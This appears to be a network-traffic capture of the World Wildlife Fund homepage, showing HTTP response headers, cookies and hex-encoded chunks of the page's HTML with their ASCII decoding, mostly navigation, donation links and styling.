                                                                                                                                                    Strict-Transport-Security: max-age=63072000
                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                    X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-Request-Id: 7ea93a8d-471b-4f1b-bb57-7c1ad067a415
                                                                                                                                                    X-Download-Options: noopen
                                                                                                                                                    X-Frame-Options: SAMEORIGIN, SAMEORIGIN
                                                                                                                                                    X-Runtime: 0.012184
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Powered-By: Phusion Passenger(R) Enterprise
                                                                                                                                                    Set-Cookie: auth_token=ImRUYk12ajA3WGdSbkpTZlNTTThlRDVNc2VYUEh1VE41RkFJbU1pY0lQMmkzUnlXTHhsQmJ1YXV3T3d2UnFQcEJCZzJWdkZ3YnNTcGZrQUlSSlpEQldBPT0i--29fde9fd58b986288e430b4fa98b67eeaa8ec3ff; path=/; secure
                                                                                                                                                    Status: 200 OK
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Set-Cookie: _wwf_session=pLFq0NZzDsxxEKWPeuEfaxisbVPGO8pINQyyMX1gwHPOdrfTV8QhiAx8s2w5ACrMMQMXAN7lmleipYwfGrkkPLdq%2BEe0z9Sk3UzRtWGy%2FBK41WRK%2BrAhT%2FOcDISOmLQu6wwCJKcuVkT7xuoqnNQ%3D--%2FLqxUnSf5m4BpFXT--yGamDBNYnAuJL8w8x0Vd1w%3D%3D; path=/; secure; HttpOnly
                                                                                                                                                    Set-Cookie: __cflb=02DiuGARDpWcJsBwRUA35tzkreDTDgfuNZZ4BBNGXq89z; SameSite=None; Secure; path=/; expires=Wed, 06-Sep-23 10:01:21 GMT; HttpOnly
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    2023-09-05 11:01:21 UTC2INData Raw: 43 46 2d 52 41 59 3a 20 38 30 31 64 66 39 34 39 31 39 37 34 38 64 65 65 2d 4d 49 41 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: CF-RAY: 801df94919748dee-MIAalt-svc: h3=":443"; ma=86400
                                                                                                                                                    2023-09-05 11:01:21 UTC2INData Raw: 37 61 34 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 57 57 46 20 2d 20 45 6e 64 61 6e 67 65 72 65 64 20 53 70 65 63 69 65 73 20 43 6f 6e 73 65 72 76 61 74 69 6f 6e 20 7c 20 57 6f 72 6c 64 20 57 69 6c 64 6c 69 66 65 20 46 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 61 6c 6c 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d
                                                                                                                                                    Data Ascii: 7a48<!DOCTYPE html><html class="js" lang="en"><head><title>WWF - Endangered Species Conservation | World Wildlife Fund</title><meta charset="utf-8"><meta name="robots" content="all"><meta name="viewport" content="width=device-width, initial-scale=
                                                                                                                                                    2023-09-05 11:01:21 UTC3INData Raw: 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 6c 64 20 57 69 6c 64 6c 69 66 65 20 46 75 6e 64 20 2d 20 54 68 65 20 6c 65 61 64 69 6e 67 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 20 69 6e 20 77 69 6c 64 6c 69 66 65 20 63 6f 6e 73 65 72 76 61 74 69 6f 6e 20 61 6e 64 20 65 6e 64 61 6e 67 65 72 65 64 20 73 70 65 63 69 65 73 2e 20 4c 65 61 72 6e 20 68 6f 77 20 79 6f 75 20 63 61 6e 20 68 65 6c 70 20 57 57 46 20 6d 61 6b 65 20 61 20 64 69 66 66 65 72 65 6e 63 65 2e 20 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 6c 64 20 57 69 6c 64 6c 69 66 65 20 46 75 6e 64 20 2d 20 54 68 65 20 6c 65 61 64 69 6e 67 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 20 69 6e 20
                                                                                                                                                    Data Ascii: cription" content="World Wildlife Fund - The leading organization in wildlife conservation and endangered species. Learn how you can help WWF make a difference. "><meta property="og:description" content="World Wildlife Fund - The leading organization in
                                                                                                                                                    2023-09-05 11:01:21 UTC4INData Raw: 70 73 3a 2f 2f 77 77 77 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 61 73 73 65 74 73 2f 77 77 66 2d 77 65 62 66 6f 6e 74 2d 66 63 64 37 35 32 36 39 64 61 37 38 34 31 37 31 61 36 30 38 37 38 32 37 35 33 30 64 37 66 37 34 35 37 33 62 36 63 31 35 30 65 37 64 65 30 62 31 62 32 37 64 62 37 32 63 37 33 65 38 62 30 34 61 2e 77 6f 66 66 32 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 32 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 66 38 33 65 37 63 31 65 34 39 34 30 62 31 66 64 33 31 36 31 38 33 64 39 2d 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d
                                                                                                                                                    Data Ascii: ps://www.worldwildlife.org/assets/wwf-webfont-fcd75269da784171a6087827530d7f74573b6c150e7de0b1b27db72c73e8b04a.woff2" as="font" type="font/woff2" crossorigin><script type="f83e7c1e4940b1fd316183d9-text/javascript">(function(w,d,s,l,i){w[l]=w[l]||[];w[l]
                                                                                                                                                    2023-09-05 11:01:21 UTC6INData Raw: 20 20 20 20 23 61 72 74 69 63 6c 65 5f 62 6c 6f 63 6b 5f 36 34 35 32 36 63 20 2e 68 6f 6d 65 70 61 67 65 2d 6e 65 77 73 5f 5f 69 6d 61 67 65 2d 70 6c 61 63 65 68 6f 6c 64 65 72 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 34 35 37 33 41 3b 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 23 61 72 74 69 63 6c 65 5f 62 6c 6f 63 6b 5f 37 34 39 36 62 30 20 2e 68 6f 6d 65 70 61 67 65 2d 6e 65 77 73 5f 5f 69 6d 61 67 65 2d 70 6c 61 63 65 68 6f 6c 64 65 72 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 34 35 37 33 41 3b 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79
                                                                                                                                                    Data Ascii: #article_block_64526c .homepage-news__image-placeholder { background-color: #34573A; } </style><style> #article_block_7496b0 .homepage-news__image-placeholder { background-color: #34573A; } </style><style> </style><sty
                                                                                                                                                    2023-09-05 11:01:21 UTC7INData Raw: 74 5f 62 6c 6f 63 6b 5f 61 31 35 32 61 33 20 2e 68 6f 6d 65 70 61 67 65 2d 6c 67 2d 63 61 6d 70 61 69 67 6e 2d 74 65 78 74 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 23 6c 61 72 67 65 5f 63 61 6d 70 61 69 67 6e 5f 74 65 78 74 5f 62 6c 6f 63 6b 5f 61 31 35 32 61 33 20 2e 68 6f 6d 65 70 61 67 65 2d 6c 67 2d 63 61 6d 70 61 69 67 6e 2d 74 65 78 74 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 23 63 61 6d 70 61 69 67 6e 5f 62 6c 6f 63 6b 5f 66 38 31 39 63 35 20
                                                                                                                                                    Data Ascii: t_block_a152a3 .homepage-lg-campaign-text { background-color: #ffffff; } #large_campaign_text_block_a152a3 .homepage-lg-campaign-text { color: #000000; } </style><style> </style><style> #campaign_block_f819c5
                                                                                                                                                    2023-09-05 11:01:21 UTC8INData Raw: 6c 3f 69 64 3d 47 54 4d 2d 57 39 38 4e 38 43 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 30 22 20 77 69 64 74 68 3d 22 30 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 22 3e 3c 2f 69 66 72 61 6d 65 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 66 38 33 65 37 63 31 65 34 39 34 30 62 31 66 64 33 31 36 31 38 33 64 39 2d 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 66 62 2d 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 3c 64
                                                                                                                                                    Data Ascii: l?id=GTM-W98N8C" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript><script type="f83e7c1e4940b1fd316183d9-text/javascript"></script><div id="fb-root"></div><div id="header"><div class="wrapper"><d
                                                                                                                                                    2023-09-05 11:01:21 UTC10INData Raw: 6f 77 7c 55 70 70 65 72 20 4e 61 76 20 43 6c 69 63 6b 7c 44 6f 6e 61 74 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 72 6f 74 65 63 74 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 70 61 67 65 2f 35 32 37 31 37 2f 64 6f 6e 61 74 65 2f 31 3f 65 6e 5f 6f 67 5f 73 6f 75 72 63 65 3d 57 65 62 5f 44 6f 6e 61 74 69 6f 6e 26 61 6d 70 3b 65 61 2e 74 72 61 63 6b 69 6e 67 2e 69 64 3d 57 65 62 5f 54 6f 70 6e 61 76 26 61 6d 70 3b 73 75 70 70 6f 72 74 65 72 2e 61 70 70 65 61 6c 43 6f 64 65 3d 41 57 45 32 34 30 32 4f 51 31 38 32 39 39 41 30 31 31 37 39 52 58 22 3e 0a 44 6f 6e 61 74 65 0a 3c 2f 61 3e 20 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 61 63 74 69 6f 6e 20 61 63 74 69 6f
                                                                                                                                                    Data Ascii: ow|Upper Nav Click|Donate" href="https://protect.worldwildlife.org/page/52717/donate/1?en_og_source=Web_Donation&amp;ea.tracking.id=Web_Topnav&amp;supporter.appealCode=AWE2402OQ18299A01179RX">Donate</a> </li><li class="nav-item"><a class="action actio
                                                                                                                                                    2023-09-05 11:01:21 UTC11INData Raw: 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 69 6e 6c 69 6e 65 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 63 78 22 20 76 61 6c 75 65 3d 22 30 30 33 34 34 33 33 37 34 33 39 36 33 36 39 32 37 37 36 32 34 3a 76 33 6e 72 61 71 68 6d 65 79 6b 22 20 2f 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 69 65 22 20 76 61 6c 75 65 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 6d 6f 62 69 6c 65 2d 71 22 3e 53 65 61 72 63 68 3c 2f 6c 61 62 65 6c 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 78 22 20 69 64 3d 22 6d 6f 62 69 6c 65 2d 71 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 54 79 70 65 20 74 6f 20 73 65 61 72 63
                                                                                                                                                    Data Ascii: <div class="form-inline"><input type="hidden" name="cx" value="003443374396369277624:v3nraqhmeyk" /><input type="hidden" name="ie" value="UTF-8" /><label for="mobile-q">Search</label><input type="text" name="x" id="mobile-q" placeholder="Type to searc
                                                                                                                                                    2023-09-05 11:01:21 UTC12INData Raw: 65 22 20 64 61 74 61 2d 74 72 61 63 6b 2d 65 76 65 6e 74 3d 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 55 70 70 65 72 20 4e 61 76 20 43 6c 69 63 6b 7c 54 6f 67 67 6c 65 20 44 6f 6e 61 74 65 20 44 72 6f 70 64 6f 77 6e 20 4c 69 6e 6b 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 63 72 65 65 6e 2d 72 65 61 64 65 72 22 3e 54 6f 67 67 6c 65 20 44 6f 6e 61 74 65 20 62 75 74 74 6f 6e 20 3c 2f 73 70 61 6e 3e 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 73 76 67 2d 69 63 6f 6e 20 2d 6f 70 65 6e 22 3e 0a
                                                                                                                                                    Data Ascii: e" data-track-event="Homepages Show|Upper Nav Click|Toggle Donate Dropdown Links"><span class="screen-reader">Toggle Donate button </span><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" aria-hidden="true" class="svg-icon -open">
                                                                                                                                                    2023-09-05 11:01:21 UTC14INData Raw: 3b 73 20 4e 61 6d 65 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 20 3c 2f 6c 69 3e 0a 3c 6c 69 3e 0a 3c 61 20 64 61 74 61 2d 74 72 61 63 6b 2d 65 76 65 6e 74 3d 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 55 70 70 65 72 20 4e 61 76 20 43 6c 69 63 6b 7c 44 6f 6e 61 74 65 20 2d 20 52 65 6e 65 77 20 79 6f 75 72 20 4d 65 6d 62 65 72 73 68 69 70 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 72 6f 74 65 63 74 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 70 61 67 65 2f 35 33 30 38 32 2f 64 6f 6e 61 74 65 2f 31 3f 65 6e 5f 6f 67 5f 73 6f 75 72 63 65 3d 57 65 62 5f 44 6f 6e 61 74 69 6f 6e 26 61 6d 70 3b 65 61 2e 74 72 61 63 6b 69 6e 67 2e 69 64 3d 57 65 62 5f 54 6f 70 6e 61 76 26 61 6d 70 3b 73 75 70 70 6f 72 74 65 72 2e 61 70 70 65 61 6c 43 6f 64 65
                                                                                                                                                    Data Ascii: ;s Name</span></a> </li><li><a data-track-event="Homepages Show|Upper Nav Click|Donate - Renew your Membership" href="https://protect.worldwildlife.org/page/53082/donate/1?en_og_source=Web_Donation&amp;ea.tracking.id=Web_Topnav&amp;supporter.appealCode
                                                                                                                                                    2023-09-05 11:01:21 UTC15INData Raw: 76 2d 31 2d 70 61 6e 65 6c 2d 37 31 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 20 64 61 74 61 2d 74 72 61 63 6b 2d 65 76 65 6e 74 3d 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 55 70 70 65 72 20 4e 61 76 20 43 6c 69 63 6b 7c 54 6f 67 67 6c 65 20 41 64 6f 70 74 20 44 72 6f 70 64 6f 77 6e 20 4c 69 6e 6b 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 63 72 65 65 6e 2d 72 65 61 64 65 72 22 3e 54 6f 67 67 6c 65 20 41 64 6f 70 74 20 62 75 74 74 6f 6e 20 3c 2f 73 70 61 6e 3e 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d
                                                                                                                                                    Data Ascii: v-1-panel-71" aria-expanded="false" data-track-event="Homepages Show|Upper Nav Click|Toggle Adopt Dropdown Links"><span class="screen-reader">Toggle Adopt button </span><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" aria-hidden=
                                                                                                                                                    2023-09-05 11:01:21 UTC16INData Raw: 76 20 43 6c 69 63 6b 7c 41 64 6f 70 74 20 2d 20 4d 6f 72 65 20 47 69 66 74 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 66 74 73 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 67 69 66 74 2d 63 65 6e 74 65 72 2f 67 69 66 74 73 2f 47 69 66 74 73 2d 61 6e 64 2d 41 63 63 65 73 73 6f 72 69 65 73 2e 61 73 70 78 3f 73 63 3d 41 57 59 32 32 30 39 4f 51 31 38 33 33 35 41 30 32 30 37 33 52 58 26 61 6d 70 3b 73 5f 73 75 62 73 72 63 3d 74 6f 70 6e 61 76 22 3e 0a 3c 73 70 61 6e 3e 4d 6f 72 65 20 47 69 66 74 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 20 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76
                                                                                                                                                    Data Ascii: v Click|Adopt - More Gifts" href="https://gifts.worldwildlife.org/gift-center/gifts/Gifts-and-Accessories.aspx?sc=AWY2209OQ18335A02073RX&amp;s_subsrc=topnav"><span>More Gifts</span></a> </li></ul></div></div></div></li></ul></div><div class="nav
                                                                                                                                                    2023-09-05 11:01:21 UTC18INData Raw: 77 2d 61 6c 6c 22 20 64 61 74 61 2d 74 72 61 63 6b 2d 65 76 65 6e 74 3d 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 55 70 70 65 72 20 4e 61 76 20 43 6c 69 63 6b 7c 4f 75 72 20 57 6f 72 6b 20 2d 20 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 6f 75 72 20 69 6d 70 61 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 69 6e 69 74 69 61 74 69 76 65 73 22 3e 0a 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 6f 75 72 20 69 6d 70 61 63 74 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 61 72 69 61 2d 68 69 64 64 65
                                                                                                                                                    Data Ascii: w-all" data-track-event="Homepages Show|Upper Nav Click|Our Work - Learn more about our impact" href="https://www.worldwildlife.org/initiatives">Learn more about our impact<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" aria-hidde
                                                                                                                                                    2023-09-05 11:01:21 UTC19INData Raw: 2d 65 76 65 6e 74 3d 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 55 70 70 65 72 20 4e 61 76 20 43 6c 69 63 6b 7c 4f 75 72 20 57 6f 72 6b 20 2d 20 53 75 73 74 61 69 6e 61 62 69 6c 69 74 79 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 74 6f 70 69 63 73 2f 73 75 73 74 61 69 6e 61 62 69 6c 69 74 79 22 3e 53 75 73 74 61 69 6e 61 62 69 6c 69 74 79 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 2d 67 72 6f 75 70 20 70 72 69 6d 61 72 79 22 3e 0a 3c 75 6c 3e 0a 3c 6c 69 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6e 61 76 2d 68 65 61 64 65 72 22 3e 48 6f 77 20 77 65 20 77 6f 72 6b 3c 2f 73 70 61 6e 3e 0a 3c 2f 6c 69 3e 0a 3c 6c
                                                                                                                                                    Data Ascii: -event="Homepages Show|Upper Nav Click|Our Work - Sustainability" href="https://www.worldwildlife.org/topics/sustainability">Sustainability</a></li></ul></div><div class="nav-group primary"><ul><li><span class="nav-header">How we work</span></li><l
                                                                                                                                                    2023-09-05 11:01:21 UTC20INData Raw: 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 55 70 70 65 72 20 4e 61 76 20 43 6c 69 63 6b 7c 4f 75 72 20 57 6f 72 6b 20 2d 20 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 6f 75 72 20 69 6d 70 61 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 69 6e 69 74 69 61 74 69 76 65 73 22 3e 0a 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 6f 75 72 20 69 6d 70 61 63 74 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 73 76 67 2d 69 63 6f 6e
                                                                                                                                                    Data Ascii: "Homepages Show|Upper Nav Click|Our Work - Learn more about our impact" href="https://www.worldwildlife.org/initiatives">Learn more about our impact<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" aria-hidden="true" class="svg-icon
                                                                                                                                                    2023-09-05 11:01:21 UTC22INData Raw: 20 30 20 31 31 30 20 31 2e 38 36 48 32 2e 39 33 61 2e 39 33 2e 39 33 20 30 20 30 31 30 2d 31 2e 38 36 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 2d 61 63 63 6f 72 64 69 6f 6e 2d 70 61 6e 65 6c 22 20 69 64 3d 22 70 72 69 6d 61 72 79 2d 6e 61 76 2d 70 61 6e 65 6c 2d 31 36 35 22 20 72 6f 6c 65 3d 22 72 65 67 69 6f 6e 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 47 65 74 20 69 6e 76 6f 6c 76 65 64 22 20 68 69 64 64 65 6e 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 2d 61 63 63 6f 72 64 69 6f 6e 2d 69 6e 6e 65 72 20 6e 61 76 2d 69 74 65 6d 2d 64 72 6f 70 64 6f 77 6e 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 76 69
                                                                                                                                                    Data Ascii: 0 110 1.86H2.93a.93.93 0 010-1.86z"></path></svg></div></button><div class="nav-item-accordion-panel" id="primary-nav-panel-165" role="region" aria-label="Get involved" hidden><div class="nav-item-accordion-inner nav-item-dropdown"><a class="nav-vi
                                                                                                                                                    2023-09-05 11:01:21 UTC23INData Raw: 6c 76 65 64 20 2d 20 47 69 76 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 70 61 67 65 73 2f 77 61 79 73 2d 74 6f 2d 73 75 70 70 6f 72 74 2d 77 77 66 22 3e 47 69 76 65 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 64 61 74 61 2d 74 72 61 63 6b 2d 65 76 65 6e 74 3d 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 55 70 70 65 72 20 4e 61 76 20 43 6c 69 63 6b 7c 47 65 74 20 69 6e 76 6f 6c 76 65 64 20 2d 20 53 65 6e 64 20 65 63 61 72 64 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 70 61 67 65 73 2f 73 65 6e 64 2d 66 72 65 65 2d 65 63 61 72 64 73 2d 74 6f 2d 79 6f
                                                                                                                                                    Data Ascii: lved - Give" href="https://www.worldwildlife.org/pages/ways-to-support-wwf">Give</a></li><li><a class="nav-link" data-track-event="Homepages Show|Upper Nav Click|Get involved - Send ecards" href="https://www.worldwildlife.org/pages/send-free-ecards-to-yo
                                                                                                                                                    2023-09-05 11:01:21 UTC24INData Raw: 6f 72 6d 3a 20 75 70 70 65 72 63 61 73 65 3b 22 3e 43 6f 6e 6e 65 63 74 20 77 69 74 68 20 75 73 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 2d 6e 61 76 2d 73 6f 63 69 61 6c 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 73 70 61 63 65 2d 61 72 6f 75 6e 64 3b 22 3e 0a 3c 64 69 76 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 66 75 6e 64 22 20 64 61 74 61 2d 74 72 61 63 6b 2d 65 76 65 6e 74 3d 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 53 6f 63 69 61 6c 20 4f 75 74 62 6f 75 6e 64 20 43 6c 69 63 6b 20 2d 20 46 6f 6f 74 65 72 7c 46 61 63 65 62 6f 6f 6b 22 20 64 61 74 61
                                                                                                                                                    Data Ascii: orm: uppercase;">Connect with us<div class="header-nav-social" style="display: flex;justify-content: space-around;"><div><a href="https://www.facebook.com/worldwildlifefund" data-track-event="Homepages Show|Social Outbound Click - Footer|Facebook" data
